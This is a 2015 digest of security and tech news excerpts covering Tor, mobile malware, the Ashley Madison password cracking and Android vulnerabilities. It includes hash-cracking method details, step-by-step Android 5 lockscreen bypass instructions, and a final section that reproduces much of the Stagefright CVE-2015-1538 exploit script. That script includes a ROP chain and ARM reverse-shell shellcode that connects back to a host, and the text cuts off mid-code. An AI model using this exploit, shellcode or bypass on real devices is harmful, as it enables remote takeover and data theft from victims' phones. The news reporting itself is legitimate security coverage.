- '::'.strtolower($password)); This meant that we could crack accounts created prior to this date with simple salted MD5. Also, the possible charset was reduced by 26 due to the use of strtolower(). Date: 31/08/2015 Filename: AccountProvider.php Function: generateLoginKey() Lines of interest: 78, 79 Algorithm: md5(lc($username).::.lc($pass).:.lc($email).:73@^bhhs#@^@8@*$). This function used a slightly different routine to generate the $loginkey as it incorporated the use of $username, $password, $email variables along with a constant salt string called $hash; and together, these variables were hashed with the MD5 algorithm. It appeared that generateLoginKey() was invoked when a user modified their account attributes (username, password and email) and as a result of this, a new loginkey was issued for that account.

- This meant that this method could be used to recover passwords of accounts which had been modified prior to this code change. Two different algorithms were added to MDXfind to support these discoveries.

- The username/email combination was supplied to MDXfind with the -u switch as a separate file. A third optimization was performed to identify and exclude MD5 hashes that could not be cracked using our discovered methods.

- The token used only the lowercase value of the password and thus a secondary step to toggle the case of each character generating each variant was necessary, in order to properly crack the bcrypt hashes.

[http://cynosureprime.blogspot.com/2015/09/how-we-cracked-millions-of-ashley.html](http://cynosureprime.blogspot.com/2015/09/how-we-cracked-millions-of-ashley.html)

.footnote[2015-09-10 17:50:52 - Unknown]

---

## America Runs Out of IPv4 Internet Addresses

- FireFury03 writes: The BBC is reporting that the American Registry for Internet Numbers (ARIN) ran out of spare IP addresses yesterday.

- "Companies in North America should now accelerate their move to the latest version of the net's addressing system.

- Now Africa is the only region with any significant blocks of the older version 4 internet addresses available."

- A British networking company that supplies schools has done an analysis on how concerned IT managers should be. This comes almost exactly 3 years after Europe ran out.

[http://tech.slashdot.org/story/15/09/25/125225/america-runs-out-of-ipv4-internet-addresses](http://tech.slashdot.org/story/15/09/25/125225/america-runs-out-of-ipv4-internet-addresses)

.footnote[2015-09-30 01:05:50 - Unknown]

---

## Bonnie and Clyde bank robbers busted after posting pics of stolen cash on Facebook

- In another photo, he is biting the money.  The Smoking Gun has more:  Mogan is a convicted felon who was just released from prison after serving about five years for robbing a bank in Lancaster, a city 20 miles east of Ashville.

- After he was caught, Jones reportedly told authorities that his drivers education consisted of playing Playstation driving games.

- Conveniently sized and wireless, this premium flash will let you easily take amazing photos in low light situations.

- Its a literal snap to use: simply attach to your smartphone, tablet, or DSLR to capture your memories in [] READ THE REST

- EDITORS 		Mark Frauenfelder Cory Doctorow David Pescovitz 	Xeni Jardin 	Rob Beschizza

[http://boingboing.net/2015/09/28/bonnie-and-clyde-bank-robbers.html](http://boingboing.net/2015/09/28/bonnie-and-clyde-bank-robbers.html)

.footnote[2015-09-30 00:58:35 - Unknown]

---

## Apple removes an app that tracks U.S. military drone strikes from its store

-   At the time, an Apple employee told Begley that the app would never be approved if it focused on US drone strikes, but would have a chance if he broadened his topic because there are certain concepts that we decide not to move forward with, and this is one.   pic.twitter.com/4jEnFbQgAT Dronestream (@dronestream) September 27, 2015     Metadata+ never the word drone  this may be how it snuck past the Apple censorship board.

- The sensitive topic of U.S. drone strikes seems to have been a problem for Apple: Begley was rejected last August because his app might be objectionable for many audiences.

- The plan is being called Thailands own Great Firewall, after the colloquial term used to describe the Chinese governments extensive and effective internet censorship [] READ THE REST

- Take flight in fresh air or zip the mini SKEYE Pico Drone through your office in between meetingswe guarantee its more fun than a coffee-break.

- EDITORS 		Mark Frauenfelder Cory Doctorow David Pescovitz 	Xeni Jardin 	Rob Beschizza

[http://boingboing.net/2015/09/29/apple-yanks-drone-strike-track.html](http://boingboing.net/2015/09/29/apple-yanks-drone-strike-track.html)

.footnote[2015-09-30 00:51:21 - Unknown]

---

## Kanye West thinks home 3D printing is killing the shoe industry

- Charles Manson is a failed wanna-be pop star and infamous murderer who we hope will remain locked up for the rest of his life.

- This pay what you want bundle will not only help you brush up on old skills, but teach you advanced techniques that will impress your current and future boss.

- From intricate Excel formulas to Outlook organization hacks, youll not only boost [] READ THE REST

- Take flight in fresh air or zip the mini SKEYE Pico Drone through your office in between meetingswe guarantee its more fun than a coffee-break.

- EDITORS 		Mark Frauenfelder Cory Doctorow David Pescovitz 	Xeni Jardin 	Rob Beschizza

[http://boingboing.net/2015/09/29/kanye-west-thinks-home-3d-prin.html](http://boingboing.net/2015/09/29/kanye-west-thinks-home-3d-prin.html)

.footnote[2015-09-30 00:50:11 - Unknown]

---

## People Who Need to Pee Are Better at Lying

- Abstract: The Inhibitory-Spillover-Effect (ISE) on a deception task was investigated.

- Deceiving requires increased access to inhibitory control.

- Participants drank small (low-control) or large (high-control) amounts of water.

- Third-party observers assessed the presence of behavioral cues and made true/lie judgments.

- In the high-control, but not the low-control condition, liars displayed significantly fewer behavioral cues to deception, more behavioral cues signaling truth, and provided longer and more complex accounts than truth-tellers.

[https://www.schneier.com/blog/archives/2015/09/people_who_need.html](https://www.schneier.com/blog/archives/2015/09/people_who_need.html)

.footnote[2015-09-30 00:47:53 - Unknown]

---

## The CIA Campaign to Steal Apple's Secrets

- Researchers also claimed the modified Xcode could force all iOS applications to send embedded data to a listening post. It remains unclear how intelligence agencies would get developers to use the poisoned version of Xcode. Researchers also claimed they had successfully modified the OS X updater, a program used to deliver updates to laptop and desktop computers, to install a keylogger. Other presentations at the CIA conference have focused on the products of Apples competitors, including Microsofts BitLocker encryption system, which is used widely on laptop and desktop computers running premium editions of Windows. The revelations that the CIA has waged a secret campaign to defeat the security mechanisms built into Apples devices come as Apple and other tech giants are loudly resisting pressure from senior U.S. and U.K. government officials to weaken the security of their products.

- Perhaps more than any other corporate leader, Apples CEO, Tim Cook, has taken a stand for privacy as a core value, while sharply criticizing the actions of U.S. law enforcement and intelligence agencies. If U.S. products are OK to target, thats news to me, says Matthew Green, a cryptography expert at Johns Hopkins Universitys Information Security Institute.

- If youre looking for a candidate for Big Brother, Lockheed Martin fits the bill. The Apple research is consistent with a much broader secret U.S. government program to analyze secure communications products, both foreign and domestic in order to develop exploitation capabilities against the authentication and encryption schemes, according to the 2013 Congressional Budget Justification.

- But they do shed light on an ongoing campaign aimed at defeating the tech giants efforts to secure its products, and in turn, its customers private data. Spies gonna spy, says Steven Bellovin, a former chief technologist for the U.S. Federal Trade Commission and current professor at Columbia University.

- By quietly exploiting these flaws rather than notifying Apple, the U.S. government leaves Apples customers vulnerable to other sophisticated governments. Security experts interviewed by The Intercept point out that the SMURF capabilities were already available to U.S. and British intelligence agencies five years ago.

[http://theintercept.com/2015/03/10/ispy-cia-campaign-steal-apples-secrets/](http://theintercept.com/2015/03/10/ispy-cia-campaign-steal-apples-secrets/)

.footnote[2015-09-29 23:48:04 - Unknown]

---

## Activists leak Russian governments plans to create a national Internet

- Activists leak Russian governments plans to create a national Internet  Meduza. News, reports, interviews, videos from Russia %seo%

[https://meduza.io/en/news/2015/09/23/activists-leak-russian-government-s-plans-to-create-a-national-internet](https://meduza.io/en/news/2015/09/23/activists-leak-russian-government-s-plans-to-create-a-national-internet)

.footnote[2015-09-30 00:28:56 - Unknown]

---

## tor-control protocol for rapidly switching circuits / new exit node to your tor instance

-  Playing with the Tor control protocol in node

- tor-control Most of this example is done with sample code from showing how to use this module.

- The fun part was making it work with NW.js for a button :) Tor control protocol specification

- create GUI tool for OS X, Linux, and Windows Set timer so that every n interval the circuit is rotated button for manaully switching circuit / getting new identity button for stopping TOR 

- I made a simple nw.js app just to test the concept of making an application that would allow you to control the onion router and request a new exit node / identity.

[https://gist.github.com/dustyfresh/eb967a19d53df4a3434f](https://gist.github.com/dustyfresh/eb967a19d53df4a3434f)

.footnote[2015-09-28 23:04:22 - Tor]

---

## Child abuse, drug sales, terrorism fears: Why cops halted a library's Tor relay ... for a month

- PDF Librarians in New Hampshire, America, were warned that running a Tor exit relay on their network would assist child abusers, drug dealers, and terrorists. Those are the remarkable facts that have emerged from a freedom-of-information request filed over the decision by Kilton Library in Lebanon, NH, to host, then take down, and then restore an exit relay of the anonymizing service in their small town.

- The documents [PDF] also show the level of attention being paid to the anonymizing service. After a special agent at the Department of Homeland Security (DHS) in Boston, Gregory Squire, noticed a newspaper article about Kilton Librarys decision to install a relay for The Onion Router service, he emailed a colleague nearby in Portsmouth complaining: Just terrific  that kid seems to be thinking just an inch past the end of her nose. He was referring to Alison Macrina, founder of the Library Freedom Project, who was trying to persuade libraries across the US to add to the current 1,000 exit nodes that exist in the Tor system, and so make its anonymous service more robust. Where Tor advocates see the system as allowing people to communicate without fear of surveillance, such as journalists and whistleblowers, or NGOs in countries that monitor communications, Homeland Security sees nothing but an opportunity for criminals to try to hide their actions. Trail The person who received the email, the commander of New Hampshires Internet Crime Against Children Task Force, Thomas Grella, then contacted Sergeant Richard Norris at the Lebanon local police station.

- We spoke about how the anonymity of the service would make it very difficult to track people engaged in criminal activity, such as child pornography, drug transactions, and terrorism.

- Id rather vote for the good because there is value to this. According to Macrina, since the decision was made and following press interest in the saga, more than a dozen other libraries have inquired about adding their own Tor relay.

- They are prepared to recall the very worst aspects of human nature to persuade people not to embrace it. It is, of course, a supreme irony that the Tor project is partly funded by the US government.

[http://www.theregister.co.uk/2015/09/22/cops_shut_down_tor_relay_for_a_month/](http://www.theregister.co.uk/2015/09/22/cops_shut_down_tor_relay_for_a_month/)

.footnote[2015-09-23 23:17:17 - Tor]

---

## Russian biz talks the Tor but can't walk the walk: Effort to wreck network takes bizarre turn

- The Russian governments plan to unmask citizens who use the anonymizing network Tor has hit a snag: the company hired to do the job is trying to wriggle out of its contract. In July 2014, the Russian Interior Ministry advertised for a firm to study the possibility of obtaining technical information about users (user equipment) TOR anonymous network. The price offered was 3,900,000 roubles (US$59,000 or 38,700).

- The US government and others have spent much more than that building and sponsoring the Tor network, and plenty of intelligence agencies would pay a lot more for access to the data running over the anonymized network. Nevertheless, the Central Research Institute of Economics, Informatics and Control Systems, a subsidiary of state-run high-tech goods manufacturer Rostec, took up the challenge.

- But it now appears to be trying to get out of the deal. Bloomberg notes that, bafflingly, Rostec has paid $150,000 to secure the services of Russian law firm Pleshakov, Ushkalov and Partners, with a brief to work on extricating Central Research from its contract with President Putins government. Thats not going to go down well with the Kremlin.

- The Russian government isnt a big fan of internet freedom, and use of Tor within its borders is on the rise as internet users seek a little privacy in the face of draconian censorship laws implemented by Putins cronies. So far, it seems, Tor remains secure.

-  Sponsored:  OpenStack for enterprise: The tipping point cometh 

[http://www.theregister.co.uk/2015/09/23/russian_tor_takedown_attempt_fizzles/](http://www.theregister.co.uk/2015/09/23/russian_tor_takedown_attempt_fizzles/)

.footnote[2015-09-23 23:16:01 - Tor]

---

## Mapping How Tors Anonymity Network Spread Around the World

- But as the anonymity software Tor approaches its tenth year online, its grown into a powerful, deeply-rooted privacy network overlaid across the internet.

- And a new real-time map of that network illustrates just how widespread and global that network has become. On Friday, freelance Sydney-based coder Luke Millanta launched Onionview, a web-based project that counts and tracks the geographic location of Tor nodes, the volunteer computers that bounce encrypted traffic around the web to offer Tor users anonymity.

- Thats what 6,000 nodes around the world looks like. Millantas map also makes it possible to compare which countries host the largest chunks of the Tor network.

- Despite Tors origins as a research project at the US Navy and later at MIT, privacy-loving Germany has overtaken the US in total nodes, with France, the Netherlands, and Russia coming close behind.

- Even in 2012, Snowdens leaked NSA documents showed that the agency was having trouble identifying Tor users.

[http://www.wired.com/2015/09/mapping-tors-anonymity-network-spread-around-world/](http://www.wired.com/2015/09/mapping-tors-anonymity-network-spread-around-world/)

.footnote[2015-09-20 20:19:20 - Tor]

---

## Bitcoin is not anonymous - Elliptic

- On day nine of the trial of Ross Ulbricht, the prosecution called their key witness: Ilhwan Yum, an FBI special agent and cyber security expert

- FBI Agent Yums testimony provided a clear and high-profile illustration of what those with a technical understanding of the digital currency already knew  that bitcoin transactions are anything but anonymous

- Yum provided the smoking gun in the form of incontrovertible proof that over a 12-month period, more than 700,000 bitcoins had been transferred from the Silk Road bitcoin wallet directly to a wallet on Ross Ulbrichts laptop

- So bitcoin is pseudonymous rather than anonymous

- Bitcoin therefore provides the ultimate paper trail for law enforcement agencies, tax authorities and compliance professionals

[https://www.elliptic.co/bitcoin-is-not-anonymous/](https://www.elliptic.co/bitcoin-is-not-anonymous/)

.footnote[2015-09-19 23:42:12 - Tor]

---

## US librarians defy cops, Feds  and switch on their Tor exit node

- The first library in the US to host a Tor exit node has voted to turn it back on despite warnings by the cops that it could lead to criminal behavior. A meeting late Tuesday of the board of trustees of the Kilton Public Library in West Lebanon, New Hampshire, saw it stand by its unanimous decision to embrace the anonymizing service.

- In June, Kilton had agreed to be part of a pilot program called the Library Freedom Project, which aims to use spare bandwidth at the nations public libraries to expand the Tor network, and so safeguard peoples privacy online.

- They even suggested it could result in child abuse images being accessed. After that meeting the box was turned off and the decision whether to turn it back on was moved to the next board meeting. Tor  standing for The Onion Router  tries to make internet traffic anonymous by routing it through different nodes before it reaches its final destination.

- The meeting was covered by local paper the Concord Monitor, which reported that chair Francis Oscadal said: With any freedom there is risk.

- We simply came in as law enforcement and said, These are the concerns, according to the Monitor. Deputy City Manager Paula Maville, who had also warned about the service, said it wasnt an issue of freedom of speech, but simply about making an informed decision.

[http://www.theregister.co.uk/2015/09/16/library_turns_tor_relay_back_on/](http://www.theregister.co.uk/2015/09/16/library_turns_tor_relay_back_on/)

.footnote[2015-09-18 13:28:45 - Tor]

---

## 'Dissent,' a New Type of Security Tool, Could Markedly Improve Online Anonymity

-  Researchers at the Dissent Project are building a new kind of anonymity tool that, when used in conjunction with the Tor anonymity network, could significantly improve online anonymity. Unlike Tor's onion routing architecture, which routes internet traffic through a series of "onion layers" to obscure your identity, Dissent implements a dining cryptographers network, or DC-net, which makes possible cryptographically-provable anonymity. The dining cryptographers problem was first proposed in 1988 by cryptographer David Chaum, and involves cryptographers trying to anonymously prove to each other whether or not the NSA paid their restaurant bill.

- The key takeaway is that, unlike onion routing, DC nets offer cryptographically provable anonymityalthough at a much slower speed than Tor.

- "His designs are more amenable to proofs of security than Tor (good), but the tradeoff is that they don't scale as well (bad), and they're not as resilient to real-world things like denial of service attacks.

- He's reluctant to name a date for application release, but hopes to have something for users to play with by early next year. Tor isn't going away any time soon.

- But, as Dingledine emphasizes, more research into anonymous communication is needed. "It is great to have people continuing to explore alternate approaches to Tor.

[http://motherboard.vice.com/read/dissent-a-new-type-of-security-tool-could-markedly-improve-online-anonymity](http://motherboard.vice.com/read/dissent-a-new-type-of-security-tool-could-markedly-improve-online-anonymity)

.footnote[2015-09-16 16:18:08 - Tor]

---

## FBI Director Claims Tor and the Dark Web Wont Let Criminals Hide From His Agents

-  FBI Director James Comey said on Thursday that criminals who think they can evade law enforcement using the dark web and the Tor Network, which is designed to conceal the Internet addresses of the computers being used, are kidding themselves. Comey was asked about criminal use of the so-called dark web  parts of the Internet walled off from ready access  at a House Intelligence Committee hearing on cybersecurity on Thursday.

-  Comeys statement could be read as an assertion that U.S. law enforcement has found a way to routinely thwart Tors system for providing anonymity to users.

- If thats Comeys intended implication, and if its true, it would would represent an enormous expansion of the U.S. governments known abilities, as well as a significant blow to privacy advocates. But online security experts consulted by The Intercept cast doubt on that possibility.

- Who knows? He added, Its certainly good posturing. Chris Soghoian, chief technologist for the American Civil Liberties Union, told The Intercept that Comey is not credible.

- He has every incentive to bluff. Comey has recently been making headlines for alleging  also without evidence  that he is increasingly unable to track criminal conduct online due to end-to-end encryption.

[http://theintercept.com/2015/09/10/comey-asserts-tors-dark-web-longer-dark-fbi/](http://theintercept.com/2015/09/10/comey-asserts-tors-dark-web-longer-dark-fbi/)

.footnote[2015-09-12 20:13:24 - Tor]

---

## Over 225,000 Apple Accounts Compromised Via iOS Malware

- Researchers from Palo Alto Networks and WeipTech have unearthed a scheme that resulted in the largest known Apple account theft caused by malware.

- All in all, some 225,000 valid Apple accounts have been compromised.

- Most of the victims are Chinese  the malware is distributed through third-party Cydia repositories in China  but users in other countries have also been affected (European countries, the U.S., Australia, South Korea, and so on).

- "The malware hooks system processes through MobileSubstrate, and steals Apple account usernames, passwords and device GUID by intercepting iTunes traffic on the device," Palo Alto researcher Claud Xiao explained.

- "KeyRaider steals Apple push notification service certificates and private keys, steals and shares App Store purchasing information, and disables local and remote unlocking functionalities on iPhones and iPads.

[http://apple.slashdot.org/story/15/08/31/1245225/over-225000-apple-accounts-compromised-via-ios-malware](http://apple.slashdot.org/story/15/08/31/1245225/over-225000-apple-accounts-compromised-via-ios-malware)

.footnote[2015-09-04 03:53:14 - Mobile]

---

## Chinese mobe market suffers pre-pwned Android pandemic

- Security researchers have discovered more examples of pre-installed malware on Android smartphones. G DATA found that more than two dozen phones from different manufacturers were already compromised straight out of the box.

- Kit from manufacturers including Huawei, Lenovo and Xiaomi have pre-installed espionage functions in the firmware.

- G DATA suspects that middlemen modified the device software to steal user data and inject their own advertising to earn money. Other possibilities include unintentional infection through compromised devices in the supply chain (a problem which affected Vodafone Spain back in 2010) or intentional interference by government spies.

- Many of the models implicated in the malfeasance sell well in China. The pre-pwned device issue has become a perennial problem for privacy-conscious smartphone users.

- Regardless of blame, the incident illustrated the general risk, more examples of which are not hard to find. Late last year Palo Alto Networks discovered that high-end Androids from Coolpad came pre-pwned with the CoolReaper malware.

[http://www.theregister.co.uk/2015/09/02/pre_pwned_android/](http://www.theregister.co.uk/2015/09/02/pre_pwned_android/)

.footnote[2015-09-04 03:46:12 - Mobile]

---

## New Android ransomware locks out victims by changing lock screen PIN

- EnlargeEsetMalicious apps that disable Android phones until owners pay a hefty ransom are growing increasingly malevolent and sophisticated as evidenced by a newly discovered sample that resets device PIN locks, an advance that requires a factory reset. Dubbed Android/Lockerpin.A, the app first tricks inexperienced users into granting it device administrator privileges.

- When targets click on the continue button, they really grant the malicious app elevated rights that allow it to make changes to the Android settings.

- By contrast, earlier forms of Android ransomware generally were thwarted, usually by deactivating administrator privileges and then uninstalling the app after the infected device is booted into safe mode. After clicking on the button, the users device is doomed, Lukas Stefanko, a researcher with antivirus provider Eset, wrote in a blog post published Thursday.

- From there it will change the PIN and periodically continue to overlay a fake window in an attempt to hold on to the elevated privileges.

- If it were to find its way into the official Google Play marketas happens regularly with malicious Android appsit could represent a real threat for a much larger number of people.

[http://arstechnica.com/security/2015/09/new-android-ransomware-locks-out-victims-by-changing-lock-screen-pin/](http://arstechnica.com/security/2015/09/new-android-ransomware-locks-out-victims-by-changing-lock-screen-pin/)

.footnote[2015-09-12 11:39:50 - Mobile]

---

## Chinese ad firm pwns Android users, creates hijackable global botnet

- A Chinese advertising company has infected and completely hijacked likely hundreds of thousands of Android handsets with an attack so careless it exposes a global botnet to easy hijacking and opens handsets to total compromise by any malware. FireEye (yet again, these guys need to get some sleep) researchers Yulong Zhang, Zhaofeng Chen, and Yong Kang say Chinese marketing company Xinyinhe which promotes itself as a big player in the app advertising game is behind the attack.

- They didnt tag the number of infected devices, but Xinyinhe claims to have customers in 50 countries and be valued as of November at $100 million after it received some $20 million in seed funding in 2013. FireEye has been asked for the number of infected victims. The trio say the attack builds its network of customers by tricking them to install malware that gains root access on some 308 different handsets running virtually all versions of the Android operating system from Gingerbread (2.3.4) to the lastest stable Lollipop (5.1.1) build. These victims are enslaved into a very large global botnet that, incredibly, uses plain text for command and control communications allowing anyone to hijack it. 

- Infection process  Once infected the malware will install legitimate but booby trapped applications without user consent, automatically clicking installation and permission warning prompts. It installs a backdoor and maintains persistence on devices, and opens its attack vector to compromise by third party malware. Xinyinhe cannot be reached for comment as it has taken down its site and another linked to the malware.

- An overview of the malicious adware workflow.  Any affected user may have inadvertently compromised their user credentials for some online services [and should] change their passwords for any online services such as iTunes, online banking, email, and work accounts. The trio says the attackers are so careless that the infected app which have full control root access to phones will allow anyone malware share that priveleged access. This means writers of less harmful malware could take advantage of the infections to gain root privilege, hijack the devices, and inflict permanent damages. So far some 300 infected apps have been discovered including the popular Amazon, Memory Booster, and Clean Master. 

- World infection map  The adware uses novel and impressive techniques for persistence and obfuscation such as installing system level services, and modifying the boot recovery script used to flash new operating system ROMs. Zhang, Chen, and Kang say attackers have repackaged the popular apps with malicious logic that is continuously updated. The most recent samples sport more powerful obfuscation and packing mechanisms. Additional technical information is available in FireEyes analysis.

[http://www.theregister.co.uk/2015/09/23/chinese_ad_firm_pwns_android_users_creates_hijackable_global_botnet/](http://www.theregister.co.uk/2015/09/23/chinese_ad_firm_pwns_android_users_creates_hijackable_global_botnet/)

.footnote[2015-09-23 23:16:55 - Mobile]

---

## XCodeGhost iOS infection toll rises from 39 to a WHOPPING 4,000 apps

- The number of XCodeGhost-infected iOS apps, initially pegged at 39, has ballooned to more than 4,000. The staggering increase was the handiwork of analysis by FireEye researchers who said that the apps were being hosted on the official Apple App Store.

- Immediately after learning of XcodeGhost, FireEye Labs identified more than 4,000 infected apps on the App Store, FireEye said.  The malicious apps steal device and user information and send stolen data to a command and control (CnC) server [and] also accept remote commands including the ability to open URLs sent by the CnC server.

- These URLs can be phishing webpages for stealing credentials, or a link to an enterprise-signed malicious app that can be installed on non-jailbroken devices.  A FireEye spokesman told Vulture South that many of the infected apps were owned by big Chinese global brands such as consumer electronics, telcos, and banks. The Register has asked FireEye for the names of some of the prominent affected apps and will update this story should the information come to hand. FireEye put the huge increase in the number of discovered apps to fast scanning by its mobile threat prevention platform. Apple has continued to exorcise the App Store of malicious apps uploaded in what has been widely considered to be Cupertinos first big malware attack. The apps were infected after developers downloaded a copy of the Xcode iOS development tool through a file-sharing service.

- That package was modified to trojanise apps in a way that passed App Store security checks, and was advertised on popular developer forums as a faster source to download the 3Gb Xcode file. The success of the XCodeGhost phish is staggering; that some 4,000 apps were hosed indicates that a lot of developers were sucked into what must have been a very well-executed attack by highly capable malefactors. Veracode principal solutions architect John Smith said that the attack challenged the notion that iOS was safer than Android. In recent years it has seemed that the problem of mobile malware was bigger for Android than for iOS, Smith said. The more rigorous testing regime required before an iOS app can be published has always been considered to be the reason for this difference, but in this case it seems to have fallen short. 

-  Sponsored:  OpenStack for enterprise: The tipping point cometh 

[http://www.theregister.co.uk/2015/09/23/xcodeghost_ios_app_infection_toll_rises_to_four_thousand/](http://www.theregister.co.uk/2015/09/23/xcodeghost_ios_app_infection_toll_rises_to_four_thousand/)

.footnote[2015-09-23 23:15:46 - Mobile]

---

## Android 5 lock-screens can be bypassed by typing in a reeeeally long password. In 2015

- If youve got an Android 5 smartphone with anything but the very latest version of Lollipop on it, its best to use a PIN or pattern to secure your lock-screen  because theres a trivial bypass for its password protection

- By manipulating a sufficiently large string in the password field when the camera app is active, an attacker is able to destabilize the lockscreen, causing it to crash to the home screen

[http://www.theregister.co.uk/2015/09/16/google_patches_android_lockscreen_bypass_nexus/](http://www.theregister.co.uk/2015/09/16/google_patches_android_lockscreen_bypass_nexus/)

.footnote[2015-09-18 13:29:50 - Mobile]

---

## New Android lockscreen hack gives attackers full access to locked devices

- Software bugs that allow attackers to bypass smartphone lockscreens are common enough for both Android and iOS devices, but like a fender bender on the highway, many of us cant resist the urge to gawk anyway.

- Theres anewly disclosed wayfor someone who has a few uninterrupted moments with ahandsetrunning mostversions of Android 5.x togain complete control of the device and all the data stored on it. The hack involves dumping an extremely long string into the password field after swiping open the camera from a locked phone.

- The hacker then swipes open the camera from the locked phone, accesses the options menu, and pastes the characters into the resulting password prompt.

- Samsung, LG, and cell carriers, youre on the clock.The vulnerability has been fixed in the LMY48M Android 5.1.1 build Google released last week for the Nexus 4, 5, 6, 7, 9, and 10.

- And while were on this topic of Android lock patterns, readers may be interested in recently presented research showing that many of them are surprisingly predictable.

[http://arstechnica.com/security/2015/09/new-android-lockscreen-hack-gives-attackers-full-access-to-locked-devices/](http://arstechnica.com/security/2015/09/new-android-lockscreen-hack-gives-attackers-full-access-to-locked-devices/)

.footnote[2015-09-18 13:29:46 - Mobile]

---

## Googles own researchers challenge key Android security talking point

- Members of Googles Project Zero vulnerability research team have challenged a key talking point surrounding the security of Googles Android mobile operating system.

- To wit, a key exploit mitigation known as address space layout randomization does much less than the companys overworked public relations people say in blocking attacks targeting critical weaknesses in Androids stagefright media library.

[http://arstechnica.com/security/2015/09/googles-own-researchers-challenge-key-android-security-talking-point/](http://arstechnica.com/security/2015/09/googles-own-researchers-challenge-key-android-security-talking-point/)

.footnote[2015-09-18 13:28:06 - Mobile]

---

## Android 5.x Lockscreen Bypass (CVE-2015-3860) | UT Austin Information Security Office

- By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen.

- At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein. September 2015: Elevation of Privilege Vulnerability in Lockscreen (CVE-2015-3860) The attack requires the following criteria:  Attacker must have physical access to the device User must have a password set (pattern / pin configurations do not appear to be exploitable)  Proof-of-concept  Nexus 4 factory image 5.1.1 (build LMY48I):  Attack breakdown:  From the locked screen, open the EMERGENCY CALL window.  Type a few characters, e.g.

- Continue to long-tap the cursor and paste the characters as many times as possible, until you notice the UI crash and the soft-buttons at the bottom of the screen disappear, expanding the camera to fullscreen.

- The duration and result of this step can vary significantly but the camera should eventually crash and expose sensitive functionality.

- At this point it is possible to enable USB debugging normally (About phone  tap Build number 7 times, back, Developer options  USB debugging) and access the device via the adb tool to issue arbitrary commands or access the files on the device with the full permissions of the device owner.   Timeline: 2015-06-25: Vulnerability reported privately to Android security team. 2015-07-01: Android confirms vulnerability can be reproduced, assigns LOW severity issue. 2015-07-15: Android promotes issue to MODERATE severity. 2015-08-13: Android commits a patch to fix vulnerability. 2015-09-09: Android releases 5.1.1 build LMY48M containing fix. 2015-09-14: Android marks issue public. 2015-09-15: UT ISO publishes this writeup.  jgor

[http://sites.utexas.edu/iso/2015/09/15/android-5-lockscreen-bypass/](http://sites.utexas.edu/iso/2015/09/15/android-5-lockscreen-bypass/)

.footnote[2015-09-15 19:25:37 - Mobile]

---

## Android Stagefright Remote Code Execution

- #!/usr/bin/env python# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs# Shout outs to our friends at Optiv (formerly Accuvant Labs)# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015# www.zimperium.com## Exploit for RCE Vulnerability CVE-2015-1538 #1# Integer Overflow in the libstagefright MP4 stsc atom handling## Dont forget, the output of create_mp4 can be delivered many ways!# MMS is the most dangerous attack vector, but not the only one...## DISCLAIMER: This exploit is for testing and educational purposes only.

- Use at your own risk.## With great power comes great responsibility.  Uncle Ben#import structimport socket## Creates a single MP4 atom  LEN, TAG, DATA#def make_chunk(tag, data):   if len(tag) != 4:       raise Yo!

- Thanks!#(gdb) x/10i __dl_restore_core_regs  0xb0002850 __dl_restore_core_regs: add r1, r0, #52 ; 0x34  0xb0002854 __dl_restore_core_regs+4:   ldm r1, {r3, r4, r5}  0xb0002858 __dl_restore_core_regs+8:   push    {r3, r4, r5}  0xb000285c __dl_restore_core_regs+12:  ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}  0xb0002860 __dl_restore_core_regs+16:  ldm sp, {sp, lr, pc}b0001144 __dl_mprotect:b0001144:       e92d0090        push    {r4, r7}b0001148:       e3a0707d        mov     r7, #125        ; 0x7db000114c:       ef000000        svc     0x00000000b0001150:       e8bd0090        pop     {r4, r7}b0001154:       e1b00000        movs    r0, r0b0001158:       512fff1e        bxpl    lrb000115c:       ea0015cc        b       b0006894 __dl_raise+0x10def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):   rop =    rop += struct.pack(L, sp_addr + off + 0x10) # new sp   rop += struct.pack(L, 0xb0002a98)           # new lr  pop {pc}   rop += struct.pack(L, 0xb00038b2+1)         # new pc: pop {r0, r1, r2, r3, r4, pc}   rop += struct.pack(L, sp_addr  0xfffff000) # new r0  base address (page aligned)   rop += struct.pack(L, 0x1000)               # new r1  length   rop += struct.pack(L, 7)                    # new r2  protection   rop += struct.pack(L, 0xd000d003)           # new r3  scratch   rop += struct.pack(L, 0xd000d004)           # new r4  scratch   rop += struct.pack(L, 0xb0001144)           # new pc  _dl_mprotect   native_start = sp_addr + 0x80   rop += struct.pack(L, native_start)         # address of native payload   #rop += struct.pack(L, 0xfeedfed5)          # top of stack...   # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)   buf =     # fork   buf += \x02\x70\xa0\xe3   buf += \x00\x00\x00\xef   # continue if not parent...   buf += \x00\x00\x50\xe3   buf += \x02\x00\x00\x0a   # exit parent   buf += \x00\x00\xa0\xe3   buf += \x01\x70\xa0\xe3   buf += \x00\x00\x00\xef   # setsid in child   buf += \x42\x70\xa0\xe3   buf += \x00\x00\x00\xef   # socket/connect/dup2/dup2/dup2   buf += \x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c   buf += \x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60   buf += \xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0   buf += \xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1   buf += \x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06   buf += \x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00   buf += \x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0   buf += \xe3\x00\x00\x00\xef   # execve(shell, argv, env)   buf += \x30\x00\x8f\xe2\x04\x40\x24\xe0   buf += \x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d   buf += \x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00   buf += \x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00   buf += \xef\x02\x00   # Add the connect back host/port   buf += struct.pack(!H, cb_port)   cb_host = socket.inet_aton(cb_host)   buf += struct.pack(=4s, cb_host)   # shell    buf += /system/bin/sh\x00\x00   # argv    buf += sh\x00\x00   # env    buf += 